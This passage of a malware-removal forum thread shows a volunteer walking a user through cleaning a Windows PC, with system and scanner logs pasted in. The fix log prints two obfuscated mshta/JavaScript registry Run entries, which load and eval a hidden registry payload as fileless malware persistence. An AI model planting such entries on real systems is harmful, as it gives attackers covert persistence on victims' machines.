[{E609627F-49BC-4C39-824A-2B936AD4285A}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpoews01.exeFirewallRules: [{79EFA8C9-3E84-4FA4-A6B7-814F825E9503}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpiscnapp.exeFirewallRules: [{0FE55F18-5873-43D6-8876-2913018A900D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgplgtupl.exeFirewallRules: [{4256427B-5DED-490D-B38E-F80FD7E38A3D}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exeFirewallRules: [{CE982924-4312-4329-8582-2F157DCE6F40}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgm.exeFirewallRules: [{CB084A0E-575D-47F9-B7EE-70743A373D51}] => (Allow) C:\Program Files (x86)\HP\Digital Imaging\bin\hpqusgh.exeFirewallRules: [{FB1BBE18-3EAA-44B4-84BF-75A3E2F43355}] => (Allow) C:\Program Files (x86)\HP\hp software update\hpwucli.exeFirewallRules: [{D3859A85-C2D7-4BC3-ACD6-5604E2F31812}] => (Allow) C:\Program Files (x86)\HP\digital imaging\smart web printing\smartwebprintexe.exeFirewallRules: [{CD1A1D97-17B3-40D6-847D-CD4687CE2E5E}] => (Allow) C:\Program Files (x86)\Steam\Steam.exeFirewallRules: [{0557A131-DD17-4084-882F-BB0D30A6EDBF}] => (Allow) C:\Program Files (x86)\Steam\Steam.exeFirewallRules: [{23145563-FC71-40BC-9FD7-654CA63EFFC8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exeFirewallRules: [{9600E58D-949A-498D-824D-5FBE811C5CF1}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exeFirewallRules: [{2CA24260-9ED6-4090-945B-CED9E942FF37}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout\FalloutLauncher.exeFirewallRules: [{98A60B63-F4CC-430E-8462-8EFE97882D25}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Fallout\FalloutLauncher.exeFirewallRules: [{BADE3ABE-C545-4F62-85DE-939C33466F54}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\outlook.exeFirewallRules: [{35BCB7CA-FD35-4BD9-8B38-0062B35EBBAD}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exeFirewallRules: [{9D691335-2536-4367-9E53-E87D52290D08}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exeFirewallRules: [{DF9F3AE9-2BB3-4462-8F49-7F7C14CFB593}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\22\stats.comFirewallRules: [{A81FE438-2CBC-4890-806C-53045B03CFA0}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\22\stats.exeFirewallRules: [{D66D3C4B-4CF6-4908-830A-9482F42046A0}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\22\WinWrapIDE.exeFirewallRules: [{FA803AA7-6A17-493B-972D-ACDDDDB79F55}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\22\stats.comFirewallRules: [{4CC6BD6E-D847-40F3-B44C-96254FB43858}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\22\stats.exeFirewallRules: [{15410278-C048-4BD8-8BA4-F7C8EB3C506F}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\22\WinWrapIDE.exeFirewallRules: [{653D9954-5803-4920-AD95-524353DB4A70}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Restore Points ========================= 13-01-2016 09:52:57 Windows Update ==================== Faulty Device Manager Devices ============= Name: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64Description: Cisco AnyConnect Secure Mobility Client Virtual Miniport Adapter for Windows x64Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}Manufacturer: Cisco SystemsService: vpnvaProblem: : This device is disabled. (Code 22)Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. ==================== Event log errors: ========================= Application errors:==================Error: (01/26/2016 04:11:51 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledSPRetry 21466408 Error: (01/26/2016 04:11:51 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledEvent 21466408 Error: (01/26/2016 04:11:51 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: Continuously busy for more than a second Error: (01/26/2016 04:11:50 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledSPRetry 21465394 Error: (01/26/2016 04:11:50 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledEvent 21465394 Error: (01/26/2016 04:11:50 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: Continuously busy for more than a second Error: (01/26/2016 04:11:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledSPRetry 21464396 Error: (01/26/2016 04:11:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledEvent 21464396 Error: (01/26/2016 04:11:49 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: Continuously busy for more than a second Error: (01/26/2016 04:11:48 PM) (Source: Bonjour Service) (EventID: 100) (User: )Description: Task Scheduling Error: m->NextScheduledSPRetry 21463398 System errors:=============Error: (01/26/2016 04:19:41 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)Description: The following fatal alert was received: 20. Error: (01/26/2016 09:46:16 AM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)Description: The following fatal alert was received: 20. Error: (01/26/2016 09:23:09 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (01/26/2016 09:23:09 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (01/26/2016 09:23:09 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)Description: The following fatal alert was generated: 10. The internal error state is 10. Error: (01/25/2016 07:16:57 AM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: The following boot-start or system-start driver(s) failed to load: cdrom Error: (01/25/2016 07:16:31 AM) (Source: Service Control Manager) (EventID: 7023) (User: )Description: The Offline Files service terminated with the following error: %%3 Error: (01/25/2016 07:16:31 AM) (Source: EventLog) (EventID: 6008) (User: )Description: The previous system shutdown at 10:44:08 PM on 1/24/2016 was unexpected. Error: (01/24/2016 10:41:46 PM) (Source: Service Control Manager) (EventID: 7026) (User: )Description: The following boot-start or system-start driver(s) failed to load: cdrom Error: (01/24/2016 10:41:19 PM) (Source: Service Control Manager) (EventID: 7023) (User: )Description: The Offline Files service terminated with the following error: %%3 ==================== Memory info =========================== Processor: Intel® Core i7-4700MQ CPU @ 2.40GHzPercentage of memory in use: 31%Total physical RAM: 12224.11 MBAvailable physical RAM: 8341.38 MBTotal Virtual: 24446.43 MBAvailable Virtual: 20252.17 MB ==================== Drives ================================ Drive c: () (Fixed) (Total:910.11 GB) (Free:792.38 GB) NTFS ==>[system with boot components (obtained from drive)]Drive d: (Recovery) (Fixed) (Total:21.11 GB) (Free:2.28 GB) NTFS ==>[system with boot components (obtained from drive)]Drive e: (HP_TOOLS) (Fixed) (Total:0.1 GB) (Free:0.07 GB) FAT32 ==================== MBR & Partition Table ================== ========================================================Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: C30027C9)Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)Partition 2: (Not Active) - (Size=910.1 GB) - (Type=07 NTFS)Partition 3: (Not Active) - (Size=21.1 GB) - (Type=07 NTFS)Partition 4: (Not Active) - (Size=102 MB) - (Type=0C) ==================== End of Addition.txt ============================ Best,Rich Link to post Share on other sites More sharing options...
kevinf80 Posted January 26, 2016 ID:1014863 Share Posted January 26, 2016 Hello and welcome to Malwarebytes,Please be aware the following P2P/Piracy Warning is a standard opening reply made here at Malwarebytes, we make no accusations but do make you aware of Forum Protocol.... If you're using Peer 2 Peer software such as uTorrent, BitTorrent or similar you must either fully uninstall them or completely disable them from running while being assisted here.Failure to remove or disable such software will result in your topic being closed and no further assistance being provided.If you have illegal/cracked software, cracks, keygens etc. on the system, please remove or uninstall them now and read the policy on Piracy.Anyone other than the original starter of this thread please DO NOT follow the instructions and advice posted as replies here, my help and advice is NOT related to your system and will probably cause more harm than good... Next, Download attached fixlist.txt file (end of reply) and save it to the Desktop, or the folder you saved FRST into.NOTE. It's important that both FRST and fixlist.txt are in the same location or the fix will not work.Run FRST and press the Fix button just once and wait.The tool will make a log on the Desktop (Fixlog.txt) or the folder it was ran from. Please post it to your reply. Next, Please open Malwarebytes Anti-Malware. On the Settings tab > Detection and Protection sub tab, Detection Options, tick the box "Scan for rootkits". Under Non-Malware Protection sub tab Change PUP and PUM entries to Treat detections as Malware Click on the Scan tab, then click on Scan Now >> . If an update is available, click the Update Now button. A Threat Scan will begin. When the scan is complete, click Apply Actions. Wait for the prompt to restart the computer to appear (if applicable), then click on Yes. After the restart once you are back at your desktop, open MBAM once more.To get the log from Malwarebytes do the following: Click on the History tab > Application Logs. Double click on the scan log which shows the Date and time of the scan just performed. Click Export > From export you have three options: Copy to Clipboard - if seleted right click to your reply and select "Paste" log will be pasted to your reply Text file (*.txt) - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply XML file (*.xml) - if selected you will have to name the file and save to a place of choice, recommend "Desktop" then attach to reply Please use "Copy to Clipboard, then Right click to your reply > select "Paste" that will copy the log to your reply… Next, Download Dr Web Cureit from here http://www.freedrweb.com/cureit save to your desktop. (Scroll to bottom of page) The file will be randomly named Reboot to safe mode <<<<<------------ http://www.computerhope.com/issues/chsafe.htm Run Dr Web Tick the I agree box and select continue Click select objects for scanning Tick all boxes as shown Click the wrench and select automatically apply actions to threats Press start scan The scan will now commence Once the scan has finished click open report <<<--- Do not miss this step A notepad will open Select File > Save as.. Save it to your desktopThis log will be excessive, Please attach it to your next reply… Let me see those logs... Thank you, KevinFixlist.txt Link to post Share on other sites More sharing options...
rpd Posted January 27, 2016 Author ID:1014954 Share Posted January 27, 2016 Hi, Thanks for the steps. I have attached the MWB and Drcureit logs to this post, but I have included the FRST log in the post below. I look forward to hearing about next steps. Fix result of Farbar Recovery Scan Tool (x64) Version:25-01-2016Ran by Rich (2016-01-26 20:05:08) Run:2Running from C:\Users\Rich\Desktop\FRSTLoaded Profiles: Rich (Available Profiles: Rich)Boot Mode: Normal============================================== fixlist content:*****************StartCreateRestorePoint:CloseProcesses:HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\Run: [**f65a0a67<*>] => mshta javascript:K9euYPxa="acG9";Lh7=new%20ActiveXObject("WScript.Shell");p51gzSotz="ng3NqRGyj";CPhf5=Lh7.RegRead("HKCU\\software\\6a3110a803\\986e17cc");IwxWI8j="m";eval(CPhf5);GRcDU4TH="J"; <===== ATTENTION (Value Name with invalid characters)HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\Run: [**7687f762<*>] => mshta javascript:eZ02zYETBr="V8F9";FS1=new%20ActiveXObject("WScript.Shell");CUJK2Mm="zPL4RG";VtS7o=FS1.RegRead("HKCU\\software\\6a3110a803\\986e17cc");CrvMn3hZg0="uHU";eval(VtS7o);FR8DleeMg="2Lz"; <===== ATTENTION (Value Name with invalid characters)S3 GamesAppService; "C:\Program Files (x86)\WildTangent Games\App\GamesAppService.exe" [X]S3 clwvd; system32\DRIVERS\clwvd.sys [X]C:\Users\Rich\AppData\Local\Temp\Extract.exeC:\Users\Rich\AppData\Local\Temp\McCSPInstall.dllC:\Users\Rich\AppData\Local\Temp\mccspuninstall.exeC:\Users\Rich\AppData\Local\Temp\NetFramework45.exeC:\Users\Rich\AppData\Local\Temp\SP63259.exeC:\Users\Rich\AppData\Local\Temp\SP64996.exeC:\Users\Rich\AppData\Local\Temp\SP69886.exeC:\Users\Rich\AppData\Local\Temp\SP70869.exeC:\Users\Rich\AppData\Local\Temp\SP71811.exeC:\Users\Rich\AppData\Local\Temp\UninstallHPSA.exeC:\Windows\SysWOW64\nsprs.dllC:\Windows\SysWOW64\serauth1.dllC:\Windows\SysWOW64\serauth2.dllC:\Windows\SysWOW64\ssprs.dllIE trusted site: HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\...\sharepoint.com -> hxxps://uflorida.sharepoint.comEmptyTemp:end ***************** Restore point was successfully created.Processes closed successfully.HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**f65a0a67<*> => value could not remove. Error in Deleting Value: C0000034HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\Software\Microsoft\Windows\CurrentVersion\Run\\**7687f762<*> => value could not remove. Error in Deleting Value: C0000034GamesAppService => service not found.clwvd => service not found."C:\Users\Rich\AppData\Local\Temp\Extract.exe" => not found."C:\Users\Rich\AppData\Local\Temp\McCSPInstall.dll" => not found."C:\Users\Rich\AppData\Local\Temp\mccspuninstall.exe" => not found."C:\Users\Rich\AppData\Local\Temp\NetFramework45.exe" => not found."C:\Users\Rich\AppData\Local\Temp\SP63259.exe" => not found."C:\Users\Rich\AppData\Local\Temp\SP64996.exe" => not found."C:\Users\Rich\AppData\Local\Temp\SP69886.exe" => not found."C:\Users\Rich\AppData\Local\Temp\SP70869.exe" => not found."C:\Users\Rich\AppData\Local\Temp\SP71811.exe" => not found."C:\Users\Rich\AppData\Local\Temp\UninstallHPSA.exe" => not found."C:\Windows\SysWOW64\nsprs.dll" => not found."C:\Windows\SysWOW64\serauth1.dll" => not found."C:\Windows\SysWOW64\serauth2.dll" => not found."C:\Windows\SysWOW64\ssprs.dll" => not found.HKU\S-1-5-21-3021336051-3703432070-3051997390-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\sharepoint.com => key not found. EmptyTemp: => 26.3 MB temporary data Removed. The system needed a reboot. ==== End of Fixlog 20:05:26 ====cureit.logMWB Scan Log.txt Link to post Share on other sites More sharing options...
kevinf80 Posted January 27, 2016 ID:1015066 Share Posted January 27, 2016 Thanks for those logs.... Continue: Download AdwCleaner by Xplode onto your Desktop. Double click on Adwcleaner.exe to run the tool. Click on the Scan in the Actions box Please wait fot the scan to finish.. When "Waiting for action.Please uncheck elements you want to keep" shows in top line.. Click on the Cleaning box. Next click OK on the "Closing Programs" pop up box. Click OK on the Information box & again OK to allow the necessary reboot After restart the AdwCleaner(C*)-Notepad log will appear, please copy/paste it in your next reply. Where * is the number relative to list of scans completed... Next, Please download Junkware Removal Tool to your desktop.Shut down your protection software now to avoid potential conflicts. (re-enable when done) Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator". The tool will open and start scanning your system. Please be patient as this can take a while to complete depending on your system's specifications. On completion, a log (JRT.txt) is saved to your desktop and will automatically open. Post the contents of JRT.txt into your next message. Next, Download Microsoft's " Malicious Software Removal Tool" and save direct to the desktopEnsure to get the correct version for your system....32 Bit version:https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en64 Bit version:https://www.microsoft.com/downloads/en/confirmation.aspx?FamilyId=585D2BDE-367F-495E-94E7-6349F4EFFC74&displaylang=enRight click on the Tool, select “Run as Administrator” the tool will expand to the options WindowIn the "Scan Type" window, select Quick ScanPerform a scan and Click Finish when the scan is done.Retrieve the MSRT log as follows, and post it in your next reply:1) Select the Windows key and R key together to open the "Run" function2) Type or Copy/Paste the following command to the "Run Line" and Press Enter:notepad c:\windows\debug\mrt.logThe log will include log details for each time MSRT has run, we only need the most recent log by date and time.... Post those logs, also let me know if there are any remaining issues or concerns.... Thank you, Kevin... Link to post Share on other sites More sharing options...
rpd Posted January 27, 2016 Author ID:1015221 Share Posted January 27, 2016 Hi Kevin, Thanks for all of your help so far. I haven't had any more messages, but I'm curious what the logs look like to you. I have pasted the log contents in the order you told me to run the programs. ADW: # AdwCleaner v5.031 - Logfile created 27/01/2016 at 09:58:34# Updated 25/01/2016 by Xplode# Database : 2016-01-25.3 [server]# Operating system : Windows 7 Professional Service Pack 1 (x64)# Username : Rich - RICHPC# Running from : C:\Users\Rich\Desktop\AdwCleaner.exe# Option : Cleaning# Support : http://toolslib.net/forum ***** [ Services ] ***** ***** [ Folders ] ***** [-] Folder Deleted : C:\Program Files (x86)\Coupons[-] Folder Deleted : C:\Users\Rich\AppData\Roaming\Yahoo!\Companion ***** [ Files ] ***** ***** [ DLLs ] ***** ***** [ Shortcuts ] ***** ***** [ Scheduled tasks ] ***** ***** [ Registry ] ***** [-] Key Deleted : HKLM\SOFTWARE\Classes\AppID\YMERemote.DLL[-] Key Deleted : HKLM\SOFTWARE\Classes\Interface\{8233093C-178B-484B-979E-3C6B5B147DBC}[-] Key Deleted : HKLM\SOFTWARE\Classes\TypeLib\{B722ED8B-0B38-408E-BB89-260C73BCF3D4}[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{02478D38-C3F9-4EFB-9B51-7695ECA05670}[-] Key Deleted : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{02478D38-C3F9-4EFB-9B51-7695ECA05670}[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ext\PreApproved\{EF99BD32-C1FB-11D2-892F-0090271D4F88}[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}[-] Key Deleted : [x64] HKLM\SOFTWARE\Classes\Interface\{8233093C-178B-484B-979E-3C6B5B147DBC}[-] Key Deleted : HKCU\Software\Yahoo\Companion[-] Key Deleted : HKCU\Software\Yahoo\YFriendsBar[-] Key Deleted : HKCU\Software\AppDataLow\Software\Yahoo\Companion[-] Key Deleted : HKLM\SOFTWARE\Yahoo\Companion[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\driverupdate.net[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\www.ask.com[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\ask.com[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\driverupdate.net[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\gamingwonderland.dl.tb.ask.com[-] Key Deleted : HKCU\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage\videodownloadconverter.dl.tb.ask.com ***** [ Web browsers ] ***** [-] [C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [startup_URLs] Deleted : hxxp://www.default-search.net?sid=503&aid=101&itype=n&ver=13001&tm=398&src=hmp[-] [C:\Users\Rich\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Homepage] Deleted : hxxp://www.default-search.net?sid=503&aid=101&itype=n&ver=13001&tm=398&src=hmp ************************* :: "Tracing" keys removed:: Winsock settings cleared ########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [3015 bytes] ########## JRT: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Junkware Removal Tool (JRT) by MalwarebytesVersion: 8.0.2 (01.06.2016)Operating System: Windows 7 Professional x64 Ran by Rich (Administrator) on Wed 01/27/2016 at 10:06:56.95~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ File System: 4 Successfully deleted: C:\Users\Rich\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9DAIBD59 (Folder) Successfully deleted: C:\Users\Rich\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\G7R2LFTO (Folder) Successfully deleted: C:\Users\Rich\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\VTFKNABP (Folder) Successfully deleted: C:\Users\Rich\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Z2CZOCJN (Folder) Registry: 2 Successfully deleted: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{E6254F0C-E33A-46D3-A37F-5C9370ECB46D} (Registry Key)Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{E6254F0C-E33A-46D3-A37F-5C9370ECB46D} (Registry Key) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Scan was completed on Wed 01/27/2016 at 10:11:32.06End of JRT log~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ MRT: Microsoft Windows Malicious Software Removal Tool v5.32, January 2016 (build 5.32.12202.0)Started On Wed Jan 27 10:14:07 2016 Engine: 1.1.12400.0Signatures: 1.213.1308.0 Results Summary:----------------No infection found. Link to post Share on other sites More sharing options...
kevinf80 Posted January 27, 2016 ID:1015351 Share Posted January 27, 2016 What is the current status of your system, any remaining issues or concerns.... Thank you, Kevin Link to post Share on other sites More sharing options...
rpd Posted January 27, 2016 Author ID:1015356 Share Posted January 27, 2016 Hi Kevin, At the moment I have not had any abnormalities manifest. My school cleared my IT ticket as well. In your opinion does it seem the problem has been eliminated? Thanks,Rich Link to post Share on other sites More sharing options...
kevinf80 Posted January 27, 2016 ID:1015364 Share Posted January 27, 2016 Hiya Rich Run one more scan and post the logs, if we see no malware or infection we can clean up... Run FRST one more time, ensure all boxes are checkmarked under "Whitelist" but only Addition.txt under "Optional scan" Select scan, when done post the new logs.... Thank you, Kevin Link to post Share on other sites More sharing options...
rpd Posted January 27, 2016 Author ID:1015460 Share Posted January 27, 2016 Hi Kevin, I have attached both logs due to the post length. Best,RichAddition.txtFRST.txt Link to post Share on other sites More sharing options...
kevinf80 Posted January 27, 2016 ID:1015474 Share Posted January 27, 2016 Hiya Rich, Those logs are good, nothing of concern... Run the following to clean up: Download "Delfix by Xplode" and save it to your desktop.Or use the following if first link is down:"Delfix link mirror"If your security program alerts to Delfix either, accept the alert or turn your security off.Double Click to start the program. If you are using Vista or higher, please right-click and choose run as administratorMake Sure the following items are checked: Remove disinfection tools Purge System Restore <--- this will remove all previous and possibly exploited restore points, a new point relative to system status at present will be created. Reset system settingsNow click on "Run" and wait patiently until the tool has completed.The tool will create a log when it has completed. We don't need you to post this.Any remnant files/logs from tools we have used can be deleted… Next, Read the following links to fully understand PC Security and Best Practices, you may find them useful....Answers to Common Security Questions and best PracticesDo I need a Registry Cleaner?Take care and surf safeKevin... Link to post Share on other sites More sharing options...
rpd Posted January 27, 2016 Author ID:1015492 Share Posted January 27, 2016 Hi Kevin, Thank you so much for all of your help. I have sent a small donation your way via Paypal (I wish I could afford more, college stipend is pretty tiny). Let me know if there are any problems with receiving it as I haven't sent direct like this before. My problem has been resolved so I believe this thread can be closed now. Best,Rich Link to post Share on other sites More sharing options...
kevinf80 Posted January 27, 2016 ID:1015506 Share Posted January 27, 2016 Cheers Rich and thank you for the very kind donation, you know where i`m at if you need help again in the future..... It was a pleasure to work with you... Regards, Kevin...... Link to post Share on other sites More sharing options...
LDTate Posted February 5, 2016 ID:1017651 Share Posted February 5, 2016 Glad we could help. If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread. Other members who need assistance please start your own topic in a new thread. Thanks! Link to post Share on other sites More sharing options...
Recommended Posts